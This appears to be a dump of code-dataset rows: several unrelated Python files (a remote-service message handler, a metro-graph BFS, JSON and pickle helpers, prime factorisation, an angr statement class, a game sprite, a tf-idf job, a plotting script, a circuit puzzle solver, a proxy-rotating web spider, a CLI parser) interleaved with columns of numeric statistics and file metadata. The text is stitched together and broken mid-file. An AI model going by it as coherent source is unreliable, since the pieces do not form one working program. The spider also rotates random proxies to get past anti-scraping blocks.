message = self.message_puller(self.subscriber, self.subscription, timeout=pull_timeout)
self._waiting_messages[message["message_number"]] = message
try:
while self._waiting_messages:
message = self._waiting_messages.pop(self._previous_message_number + 1)
result = self._handle_message(message)
if result is not None:
return result
except KeyError:
pass
def _handle_message(self, message):
"""Pass a message to its handler and update the previous message number.
:param dict message:
:return dict|None:
"""
self._previous_message_number += 1
try:
return self._message_handlers[message["type"]](message)
except KeyError:
logger.warning("Received a message of unknown type %r.", message["type"])
def _handle_log_message(self, message):
"""Deserialise the message into a log record and pass it to the local log handlers, adding `[REMOTE] to the
start of the log message.
:param dict message:
:return None:
"""
record = logging.makeLogRecord(message["log_record"])
record.msg = f"[{self.service_name}] {record.msg}"
logger.handle(record)
def _handle_exception(self, message):
"""Raise the exception from the responding service that is serialised in `data`.
:param dict message:
:raise Exception:
:return None:
"""
exception_message = "\n\n".join(
(
message["exception_message"],
f"The following traceback was captured from the remote service {self.service_name!r}:",
"".join(message["traceback"]),
)
)
try:
raise EXCEPTIONS_MAPPING[message["exception_type"]](exception_message)
# Allow unknown exception types to still be raised.
except KeyError:
raise type(message["exception_type"], (Exception,), {})(exception_message)
def _handle_result(self, message):
"""Convert the result to the correct form, deserialising the output manifest if it is present in the message.
:param dict message:
:return dict:
"""
logger.info("Received an answer to question %r.", self.subscription.topic.path.split(".")[-1])
if message["output_manifest"] is None:
output_manifest = None
else:
output_manifest = Manifest.deserialise(message["output_manifest"], from_string=True)
return {"output_values": message["output_values"], "output_manifest": output_manifest}
| 43.162791
| 208
| 0.653556
| 2,403
| 20,416
| 5.40283
| 0.161049
| 0.013171
| 0.008473
| 0.009859
| 0.257953
| 0.181006
| 0.141262
| 0.109066
| 0.097666
| 0.091196
| 0
| 0.003635
| 0.272335
| 20,416
| 472
| 209
| 43.254237
| 0.870288
| 0.309218
| 0
| 0.180851
| 0
| 0.003546
| 0.119457
| 0.018928
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056738
| false
| 0.003546
| 0.070922
| 0.003546
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90124bdf01042879c8d23bc0de43bbfc19264166
| 1,978
|
py
|
Python
|
Tareas/DistanciaGrafos.py
|
A01746540/SEM9Algoritmos
|
2aaf1a344413dfbece77022a5b34e0c5318aa5e5
|
[
"MIT"
] | null | null | null |
Tareas/DistanciaGrafos.py
|
A01746540/SEM9Algoritmos
|
2aaf1a344413dfbece77022a5b34e0c5318aa5e5
|
[
"MIT"
] | null | null | null |
Tareas/DistanciaGrafos.py
|
A01746540/SEM9Algoritmos
|
2aaf1a344413dfbece77022a5b34e0c5318aa5e5
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
class Graph:
metro = ['El Rosario', 'Instituto del Petroleo', 'Tacuba', 'Hidalgo', 'Tacubaya', 'Deportivo 18 de Marzo',
'Centro Medico', 'Mixcoac', 'Balderas', 'Bellas Artes', 'Guerrero', 'Martin Carrera', 'Zapata',
'Chabacano',
'Salto del Agua', 'Garibaldi', 'La Raza', 'Pino Suarez', 'Consulado', 'Candelaria', 'Ermita',
'Santa Anita', 'Oceania', 'Morelos',
'San Lazaro', 'Jamaica', 'Atlalilco', 'Pantitlan']
def __init__(self):
self.graph = defaultdict(list)
def addEdge(self, u, v):
# agregar un Edge al grafo
for val in v:
self.graph[u].append(val)
def BFS(self, s):
# realizar el BFS
d = []
for i in range(100):
d.append(0)
d[s] = 0
queue = []
visited = [False] * (max(self.graph) + 1)
queue.append(s)
visited[s] = True
while queue:
s = queue.pop(0)
print(s, end=" ")
for v in self.graph[s]:
if visited[v] == False:
queue.append(v)
visited[v] = True
d[v] = d[s] + 1
print("\nNodo inicial: El Rosario")
for i in range(28):
print(f"Desde el Rosario hasta {self.metro[i]} es {d[i]}")
g = Graph()
g.addEdge(0, [1, 2])
g.addEdge(1, [14, 15])
g.addEdge(2, [3, 4])
g.addEdge(3, [11, 12])
g.addEdge(4, [5, 6, 9])
g.addEdge(5, [8, 9])
g.addEdge(6, [7])
g.addEdge(7, [25])
g.addEdge(8, [10, 21, 25, 26])
g.addEdge(9, [3, 10])
g.addEdge(11, [10, 21])
g.addEdge(12, [13, 14])
g.addEdge(13, [11])
g.addEdge(14, [15, 17])
g.addEdge(15, [16])
g.addEdge(17, [16, 18, 19])
g.addEdge(18, [23])
g.addEdge(19, [13, 20])
g.addEdge(20, [18, 23])
g.addEdge(21, [10, 22])
g.addEdge(22, [19, 20])
g.addEdge(23, [24])
g.addEdge(24, [8, 22])
g.addEdge(25, [27])
g.addEdge(26, [24, 27])
print("BFT:")
g.BFS(0)
| 25.688312
| 110
| 0.517695
| 289
| 1,978
| 3.529412
| 0.408305
| 0.196078
| 0.011765
| 0.021569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 0.290192
| 1,978
| 77
| 111
| 25.688312
| 0.630342
| 0.020222
| 0
| 0
| 0
| 0
| 0.183884
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.016393
| 0
| 0.098361
| 0.065574
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9012e5a8ed3f5ec28adee161865cc14545390e2d
| 1,691
|
py
|
Python
|
lab04/submited/utils.py
|
Battleman/InternetAnalyticsW
|
005e5de6c0e591be6dc303ec46cc82249e70f666
|
[
"MIT"
] | null | null | null |
lab04/submited/utils.py
|
Battleman/InternetAnalyticsW
|
005e5de6c0e591be6dc303ec46cc82249e70f666
|
[
"MIT"
] | null | null | null |
lab04/submited/utils.py
|
Battleman/InternetAnalyticsW
|
005e5de6c0e591be6dc303ec46cc82249e70f666
|
[
"MIT"
] | null | null | null |
# ######################
# Some useful utilities.
# ######################
import json, os, pickle
def listPrettyPrint(l, n):
"""Prints a list l on n columns to improve readability"""
if(n == 5):
for a,b,c,d,e in zip(l[::5],l[1::5],l[2::5],l[3::5],l[4::5]):
print('{:<22}{:<22}{:<22}{:<22}{:<}'.format(a,b,c,d,e))
if(n == 4):
for a,b,c,d in zip(l[::4],l[1::4],l[2::4],l[3::4]):
print('{:<30}{:<30}{:<30}{:<}'.format(a,b,c,d))
if(n == 3):
for a,b,c in zip(l[::3],l[1::3],l[2::3]):
print('{:<30}{:<30}{:<}'.format(a,b,c))
if(n == 2):
for a,b in zip(l[::2],l[1::2]):
print('{:<40}{:<}'.format(a,b))
if(len(l)%n != 0): #print remaining
for i in range(len(l)%n):
print(l[-(len(l)%n):][i], end='\t')
def save_json(objects, path):
"""
Save a list of objects as JSON (.txt).
"""
# Remove the file if it exists
if os.path.exists(path):
os.remove(path)
for obj in objects:
# 'a' stands for 'append' to the end of the file
# '+' to create the file if it doesn't exist
with open(path, 'a+') as f:
f.write(json.dumps(obj))
f.write('\n')
def load_json(path):
"""
Read a JSON from a text file. Expect a list of objects.
"""
with open(path) as f:
lines = f.readlines()
return [json.loads(s) for s in lines]
def save_pkl(obj, path):
"""
Save an object to path.
"""
with open(path, 'wb') as f:
pickle.dump(obj, f)
def load_pkl(path):
"""
Load a pickle from path.
"""
with open(path, 'rb') as f:
return pickle.load(f)
| 25.621212
| 69
| 0.474867
| 286
| 1,691
| 2.793706
| 0.286713
| 0.020025
| 0.022528
| 0.020025
| 0.066333
| 0.032541
| 0
| 0
| 0
| 0
| 0
| 0.040362
| 0.282082
| 1,691
| 65
| 70
| 26.015385
| 0.617792
| 0.209935
| 0
| 0
| 0
| 0
| 0.070492
| 0.040984
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.029412
| 0
| 0.235294
| 0.147059
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9012f44f49fd46b9f38512bc6891494632f15f28
| 489
|
py
|
Python
|
primes/factorisation.py
|
miloszlakomy/algutils
|
f83c330a0ca31cdac536de811f447820c70ecb38
|
[
"MIT"
] | null | null | null |
primes/factorisation.py
|
miloszlakomy/algutils
|
f83c330a0ca31cdac536de811f447820c70ecb38
|
[
"MIT"
] | null | null | null |
primes/factorisation.py
|
miloszlakomy/algutils
|
f83c330a0ca31cdac536de811f447820c70ecb38
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from algutils.primes import cached_primes
def factorise(n):
if n <= 0:
raise ValueError("n must be a positive integer")
ps = cached_primes.get_primes_list(min_lim=int(n**.5) + 1)
ret = {}
for p in ps:
if n == 1:
break
if p**2 > n: # n is prime
break
if n % p == 0:
n //= p
v = 1
while n % p == 0:
n //= p
v += 1
ret[p] = v
if n > 1: # n is prime
ret[n] = 1
return ret
| 13.971429
| 60
| 0.492843
| 83
| 489
| 2.843373
| 0.481928
| 0.050847
| 0.033898
| 0.033898
| 0.059322
| 0.059322
| 0.059322
| 0
| 0
| 0
| 0
| 0.039216
| 0.374233
| 489
| 34
| 61
| 14.382353
| 0.732026
| 0.087935
| 0
| 0.190476
| 0
| 0
| 0.063348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.047619
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90192683a9596914db24fa7e2c76ff1a12788127
| 355
|
py
|
Python
|
angr/engines/soot/statements/goto.py
|
Kyle-Kyle/angr
|
345b2131a7a67e3a6ffc7d9fd475146a3e12f837
|
[
"BSD-2-Clause"
] | 6,132
|
2015-08-06T23:24:47.000Z
|
2022-03-31T21:49:34.000Z
|
angr/engines/soot/statements/goto.py
|
Kyle-Kyle/angr
|
345b2131a7a67e3a6ffc7d9fd475146a3e12f837
|
[
"BSD-2-Clause"
] | 2,272
|
2015-08-10T08:40:07.000Z
|
2022-03-31T23:46:44.000Z
|
angr/engines/soot/statements/goto.py
|
Kyle-Kyle/angr
|
345b2131a7a67e3a6ffc7d9fd475146a3e12f837
|
[
"BSD-2-Clause"
] | 1,155
|
2015-08-06T23:37:39.000Z
|
2022-03-31T05:54:11.000Z
|
import logging
from .base import SimSootStmt
l = logging.getLogger('angr.engines.soot.statements.goto')
class SimSootStmt_Goto(SimSootStmt):
def _execute(self):
jmp_target = self._get_bb_addr_from_instr(instr=self.stmt.target)
self._add_jmp_target(target=jmp_target,
condition=self.state.solver.true)
| 25.357143
| 73
| 0.704225
| 45
| 355
| 5.288889
| 0.622222
| 0.113445
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202817
| 355
| 13
| 74
| 27.307692
| 0.840989
| 0
| 0
| 0
| 0
| 0
| 0.09322
| 0.09322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
901943c57d651786afa2ce40b989408f3ebb4e7f
| 979
|
py
|
Python
|
game/entity/player.py
|
fisher60/pyweek-2021
|
294b45d768a7e0d85ac67dc4b12384e68fc4f399
|
[
"MIT"
] | 8
|
2021-03-27T21:20:28.000Z
|
2021-03-31T08:09:26.000Z
|
game/entity/player.py
|
fisher60/pyweek-2021
|
294b45d768a7e0d85ac67dc4b12384e68fc4f399
|
[
"MIT"
] | 49
|
2021-03-27T21:18:08.000Z
|
2021-04-03T02:53:53.000Z
|
game/entity/player.py
|
fisher60/pyweek-2021
|
294b45d768a7e0d85ac67dc4b12384e68fc4f399
|
[
"MIT"
] | 1
|
2021-04-02T21:58:39.000Z
|
2021-04-02T21:58:39.000Z
|
import arcade
from ..constants import TILE_SIZE, PLAYER_SCALING
from ..utils import Vector
class PlayerInventory:
keys: int = 0
class Player(arcade.Sprite):
def __init__(self, *args, **kwargs):
super().__init__(
"game/assets/sprites/square.png", PLAYER_SCALING, *args, **kwargs
)
self.inventory: PlayerInventory = PlayerInventory()
@property
def position(self) -> Vector:
return Vector(int(self.center_x), int(self.center_y))
def update(self):
...
def handle_user_input(self, key: int, modifiers: int):
"""
Handle events passed from the MainWindow.
:return:
"""
if key == arcade.key.UP:
self.center_y += TILE_SIZE
elif key == arcade.key.DOWN:
self.center_y -= TILE_SIZE
elif key == arcade.key.LEFT:
self.center_x -= TILE_SIZE
elif key == arcade.key.RIGHT:
self.center_x += TILE_SIZE
| 25.763158
| 77
| 0.597549
| 116
| 979
| 4.844828
| 0.431034
| 0.106762
| 0.085409
| 0.080071
| 0.220641
| 0.16726
| 0.124555
| 0.124555
| 0.124555
| 0
| 0
| 0.001437
| 0.28907
| 979
| 37
| 78
| 26.459459
| 0.806034
| 0.051073
| 0
| 0
| 0
| 0
| 0.033445
| 0.033445
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.12
| 0.04
| 0.44
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
901cb3458a6cbbc2527b80d00c06a9a4f1e903b2
| 2,389
|
py
|
Python
|
code/tfidf/tfidf.py
|
vadlamak/strata-teaching-the-elephant-to-read
|
5f3963c90c520ac1b7b41d21939230ef5df6414f
|
[
"Apache-2.0"
] | null | null | null |
code/tfidf/tfidf.py
|
vadlamak/strata-teaching-the-elephant-to-read
|
5f3963c90c520ac1b7b41d21939230ef5df6414f
|
[
"Apache-2.0"
] | 1
|
2021-03-26T00:26:00.000Z
|
2021-03-26T00:26:00.000Z
|
code/tfidf/tfidf.py
|
vadlamak/strata-teaching-the-elephant-to-read
|
5f3963c90c520ac1b7b41d21939230ef5df6414f
|
[
"Apache-2.0"
] | null | null | null |
import math
import string
from itertools import groupby
from operator import itemgetter
from nltk.corpus import stopwords
from nltk.tokenize import wordpunct_tokenize
N = 10788.0 # Number of documents, in float to make division work.
class TermMapper(object):
def __init__(self):
if 'stopwords' in self.params:
with open(self.params['stopwords'], 'r') as excludes:
self._stopwords = set(line.strip() for line in excludes)
else:
self._stopwords = None
self.curdoc = None
def __call__(self, key, value):
if value.startswith('='*34):
self.curdoc = int(value.strip("=").strip())
else:
for word in self.tokenize(value):
if not word in self.stopwords:
yield (word, self.curdoc), 1
def normalize(self, word):
word = word.lower()
if word not in string.punctuation:
return word
def tokenize(self, sentence):
for word in wordpunct_tokenize(sentence):
word = self.normalize(word)
if word: yield word
@property
def stopwords(self):
if not self._stopwords:
self._stopwords = stopwords.words('english')
return self._stopwords
class UnitMapper(object):
def __call__(self, key, value):
term, docid = key
yield term, (docid, value, 1)
class IDFMapper(object):
def __call__(self, key, value):
term, docid = key
tf, n = value
idf = math.log(N/n)
yield (term, docid), idf*tf
class SumReducer(object):
def __call__(self, key, values):
yield key, sum(values)
class BufferReducer(object):
def __call__(self, key, values):
term = key
values = list(values)
n = sum(g[2] for g in values)
for g in values:
yield (term, g[0]), (g[1], n)
class IdentityReducer(object):
def __call__(self, key, values):
for value in values:
yield key, value
def runner(job):
job.additer(TermMapper, SumReducer, combiner=SumReducer)
job.additer(UnitMapper, BufferReducer)
job.additer(IDFMapper, IdentityReducer)
def starter(prog):
excludes = prog.delopt("stopwords")
if excludes: prog.addopt("param", "stopwords="+excludes)
if __name__ == "__main__":
import dumbo
dumbo.main(runner, starter)
| 25.688172
| 72
| 0.612809
| 291
| 2,389
| 4.883162
| 0.309278
| 0.038001
| 0.046446
| 0.059113
| 0.120338
| 0.106967
| 0.052076
| 0.052076
| 0.052076
| 0
| 0
| 0.007598
| 0.283801
| 2,389
| 92
| 73
| 25.967391
| 0.822911
| 0.021766
| 0
| 0.144928
| 0
| 0
| 0.025696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173913
| false
| 0
| 0.101449
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
901eab214940948112dfada28e162b16759ac77e
| 589
|
py
|
Python
|
plot-wbgt.py
|
tanupoo/tools-pubsec
|
3dfea4b677226395eff89f90aebec3105ba4f4d5
|
[
"MIT"
] | 1
|
2021-05-27T21:10:04.000Z
|
2021-05-27T21:10:04.000Z
|
plot-wbgt.py
|
tanupoo/pubsec-tools
|
3dfea4b677226395eff89f90aebec3105ba4f4d5
|
[
"MIT"
] | null | null | null |
plot-wbgt.py
|
tanupoo/pubsec-tools
|
3dfea4b677226395eff89f90aebec3105ba4f4d5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import sys
import json
import matplotlib.pyplot as plt
result = json.load(sys.stdin)
x = result["hour"]
y = result["wbgt"]
fig = plt.figure(figsize=(8, 4))
ax1 = fig.add_subplot(1,1,1)
ax1.set_xlabel("hour")
ax1.set_ylabel("wbgt")
ax1.set_xticks(list(range(0,24,1)))
ax1.set_yticks(list(range(15,41,5)))
ax1.set_yticks(list(range(15,41,1)), minor=True)
ax1.set_xlim(1,24)
ax1.set_ylim(15,40)
ax1.grid(b=True, axis="x", which="major")
ax1.grid(b=True, axis="y", which="major")
ax1.grid(b=True, axis="y", which="minor")
ax1.plot(x,y)
plt.tight_layout()
plt.show()
| 21.035714
| 48
| 0.696095
| 114
| 589
| 3.517544
| 0.464912
| 0.104738
| 0.05985
| 0.089776
| 0.311721
| 0.27182
| 0.27182
| 0.147132
| 0.147132
| 0
| 0
| 0.070632
| 0.086587
| 589
| 27
| 49
| 21.814815
| 0.674721
| 0.033956
| 0
| 0
| 0
| 0
| 0.059965
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90204f12090cacf498331393d685af08f22c49b2
| 1,005
|
py
|
Python
|
day_07/day_07.py
|
GuillaumeGandon/advent-of-code-2015
|
ff4201a9a27d1ca7f687a613eeec72dd12fe1487
|
[
"MIT"
] | null | null | null |
day_07/day_07.py
|
GuillaumeGandon/advent-of-code-2015
|
ff4201a9a27d1ca7f687a613eeec72dd12fe1487
|
[
"MIT"
] | null | null | null |
day_07/day_07.py
|
GuillaumeGandon/advent-of-code-2015
|
ff4201a9a27d1ca7f687a613eeec72dd12fe1487
|
[
"MIT"
] | null | null | null |
from functools import cache
def split_row(row):
instructions, output = row.split(' -> ')
return output, tuple(instructions.split(' '))
@cache
def solve(key):
if key.isdigit():
return int(key)
else:
instructions = circuit[key]
if len(instructions) == 1:
return solve(instructions[0])
elif len(instructions) == 2:
gate, wire_or_signal = instructions
return 65535 - solve(wire_or_signal)
else:
a, gate, b = instructions
if gate == 'AND':
return solve(a) & solve(b)
elif gate == 'OR':
return solve(a) | solve(b)
elif gate == 'LSHIFT':
return solve(a) << int(b)
else:
return solve(a) >> int(b)
circuit = dict(map(split_row, open('input').read().splitlines()))
print(f"Answer part one: {solve('a')}")
solve.cache_clear()
circuit['b'] = ('16076',)
print(f"Answer part two: {solve('a')}")
| 25.769231
| 65
| 0.536318
| 118
| 1,005
| 4.508475
| 0.389831
| 0.067669
| 0.090226
| 0.06391
| 0.157895
| 0.097744
| 0.097744
| 0
| 0
| 0
| 0
| 0.018978
| 0.318408
| 1,005
| 38
| 66
| 26.447368
| 0.757664
| 0
| 0
| 0.1
| 0
| 0
| 0.084577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.033333
| 0
| 0.366667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90215693db46543c286a97842122238df6972cc0
| 523
|
py
|
Python
|
noteout/tests/test_nb_only.py
|
stefanv/noteout
|
b76b35c675fa1221be35835d56c2937e3f56b317
|
[
"BSD-2-Clause"
] | 3
|
2021-08-14T19:35:37.000Z
|
2021-08-23T16:53:51.000Z
|
noteout/tests/test_nb_only.py
|
stefanv/noteout
|
b76b35c675fa1221be35835d56c2937e3f56b317
|
[
"BSD-2-Clause"
] | 1
|
2021-11-23T18:40:45.000Z
|
2021-11-23T20:40:48.000Z
|
noteout/tests/test_nb_only.py
|
stefanv/noteout
|
b76b35c675fa1221be35835d56c2937e3f56b317
|
[
"BSD-2-Clause"
] | 1
|
2021-11-23T18:33:58.000Z
|
2021-11-23T18:33:58.000Z
|
""" Test nb-only filter
"""
from io import StringIO
from noteout.nb_only import NbonlyFilter as nnbo
from .tutils import (read_md, assert_json_equal, filter_doc)
def test_nb_only():
content = """/
Some text [notebook only]{.nb-only}more text.
::: nb-only
Only in notebook.
:::
More text.
"""
doc = read_md(StringIO(content))
filtered = filter_doc(doc, nnbo)
exp_content = """/
Some text more text.
More text.
"""
exp_doc = read_md(StringIO(exp_content))
assert_json_equal(filtered, exp_doc)
| 17.433333
| 60
| 0.692161
| 77
| 523
| 4.493506
| 0.363636
| 0.086705
| 0.057803
| 0.098266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179732
| 523
| 29
| 61
| 18.034483
| 0.806527
| 0.036329
| 0
| 0.210526
| 0
| 0
| 0.262097
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9021bc3863fa351375d2c840439601cf105a7273
| 3,241
|
py
|
Python
|
backend/fastspider.py
|
wakeblade/weiboSpiderAndCook
|
b5ca0708abd0a938eb0ac611d037a5d3daf9384f
|
[
"MIT"
] | 1
|
2020-02-08T16:22:19.000Z
|
2020-02-08T16:22:19.000Z
|
backend/fastspider.py
|
wakeblade/weiboWordCount
|
b5ca0708abd0a938eb0ac611d037a5d3daf9384f
|
[
"MIT"
] | null | null | null |
backend/fastspider.py
|
wakeblade/weiboWordCount
|
b5ca0708abd0a938eb0ac611d037a5d3daf9384f
|
[
"MIT"
] | null | null | null |
# !/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
from gevent import monkey
monkey.patch_all()
from gevent.queue import Queue
"""
import requests
import time
import random
proxies=[]
with open('./ips.txt') as f:
proxies = [line.split('@')[0] for line in f]
def randomProxy(proxies):
ip = random.choice(proxies)
return {'https':ip,'http':ip}
class Task:
def __init__(self,url=None,method='get',params=None,data=None,cookie=None):
self.url=url
self.method=method
self.params=params
self.data=data
self.cookie=cookie
def __str__(self):
return str(self.__dict__)
class Spider:
methods ={
'get':requests.get,
'post':requests.post,
'put':requests.put,
'delete':requests.delete,
'head':requests.head
}
config ={
'ERROR_DELAY':10, #反爬延迟
'PAGE_DELAY':1, #单页延迟
'RANDOM_SEED':3, #单页延迟
}
def __init__(self,header=None,proxy=None,timeout=None,config=None):
self.header=header
self.proxy=proxy
self.timeout=timeout
if config:
self.update(config)
def __str__(self):
return str(self.__dict__)
def url(self,url):
task =Task(url)
return self.task(task)
def task(self,task):
if task.url==None:
raise('Error:爬虫任务url不能为空!')
self.method ='get' if task.method==None else task.method
kwargs={'url':task.url}
if self.header:
kwargs['headers']=self.header
if self.proxy:
kwargs['proxies']=self.proxy
if self.timeout:
kwargs['timeout']=self.timeout
if task.params:
kwargs['params']=task.params
if task.cookie:
kwargs['cookies']=task.cookie
if task.data:
kwargs['data']=task.data
#print("\n{} \n- {}\n".format(self,task))
delay=random.randint(0,self.config['RANDOM_SEED'])
while True:
try:
res = self.methods[self.method](**kwargs)
except Exception as e:
#print(e)
kwargs['proxies']=randomProxy(proxies)
print('(延迟{}s)==={}==={}'.format(str(delay),kwargs['proxies'],task.url))
delay+=1
time.sleep(delay*self.config['ERROR_DELAY'])
else:
time.sleep(delay*self.config['PAGE_DELAY'])
break
return res
"""
url = 'http://icanhazip.com'
header ={
'Accept':'*/*',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Language':'zh-CN',
'Accept-Encoding':'gzip, deflate',
#'Connection': 'Keep-Alive',
'Connection': 'close',
'Cache-Control': 'no-cache',
'User-Agent':'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.01)'
}
task1=Task(url=url,method='post')
task2=Task(url)
#spider = Spider(header,randomProxy(proxies),(2,2))
spider = Spider()
#print(spider.task(task2).text)
print(spider.url(url).text)
#t = timeit.timeit(stmt='spider(task1.proxies(randomProxy(proxies)))',setup='from __main__ import spider,task1,randomProxy,proxies',number=10)
#print(t)
"""
| 28.429825
| 142
| 0.573588
| 393
| 3,241
| 4.641221
| 0.348601
| 0.023026
| 0.012061
| 0.017544
| 0.055921
| 0.029605
| 0.029605
| 0
| 0
| 0
| 0
| 0.012642
| 0.267819
| 3,241
| 114
| 143
| 28.429825
| 0.756005
| 0.05523
| 0
| 0.055556
| 0
| 0
| 0.085813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0
| 0.041667
| 0.027778
| 0.263889
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9022b8901ebe6c1ee9599a4efe5b224353a4bd15
| 8,328
|
py
|
Python
|
crops/command_line/crops-cropstr.py
|
jjavier-bm/crops
|
658a98f9c168cc27b3f967e7a60a0df896ef5ac6
|
[
"BSD-3-Clause"
] | null | null | null |
crops/command_line/crops-cropstr.py
|
jjavier-bm/crops
|
658a98f9c168cc27b3f967e7a60a0df896ef5ac6
|
[
"BSD-3-Clause"
] | 5
|
2020-07-17T08:45:22.000Z
|
2022-03-11T13:39:26.000Z
|
crops/command_line/crops-cropstr.py
|
jjavier-bm/crops
|
658a98f9c168cc27b3f967e7a60a0df896ef5ac6
|
[
"BSD-3-Clause"
] | 1
|
2020-07-07T15:42:07.000Z
|
2020-07-07T15:42:07.000Z
|
"""==========
This script will remove a number of residues from a sequence file
in agreement to the intervals and other details supplied.
"""
from crops.about import __prog__, __description__, __author__, __date__, __version__
import argparse
import os
from crops.io import check_path
from crops.io import outpathgen
from crops.io import parsers as cin
from crops.io import taggers as ctg
from crops.core import ops as cop
from crops import command_line as ccl
logger=None
def create_argument_parser():
"""Create a parser for the command line arguments used in crops-renumber"""
parser = argparse.ArgumentParser(prog=__prog__, formatter_class=argparse.RawDescriptionHelpFormatter,
description=__description__+' ('+__prog__+') v.'+__version__+'\n'+__doc__)
parser.add_argument("input_seqpath",nargs=1, metavar="Sequence_filepath",
help="Input sequence filepath.")
parser.add_argument("input_strpath",nargs=1, metavar="Structure_filepath",
help="Input structure filepath or dir. If a directory is inserted, it will act on all structure files in such directory.")
parser.add_argument("input_database",nargs=1, metavar="Intervals_database",
help="Input intervals database filepath.")
parser.add_argument("-o","--outdir",nargs=1,metavar="Output_Directory",
help="Set output directory path. If not supplied, default is the one containing the input sequence.")
sections=parser.add_mutually_exclusive_group(required=False)
sections.add_argument("-t","--terminals",action='store_true',default=False,
help="Ignore interval discontinuities and only crop the ends off.")
sections.add_argument("-u","--uniprot_threshold", nargs=2, metavar=("Uniprot_ratio_threshold","Sequence_database"),
help='Act if SIFTS database is used as intervals source AND %% residues from single Uniprot sequence is above threshold. Threshold: [MIN,MAX)=[0,100). Database path: uniclust##_yyyy_mm_consensus.fasta-path or server-only. The latter requires internet connexion.')
parser.add_argument('--version', action='version', version='%(prog)s '+ __version__)
return parser
def main():
parser = create_argument_parser()
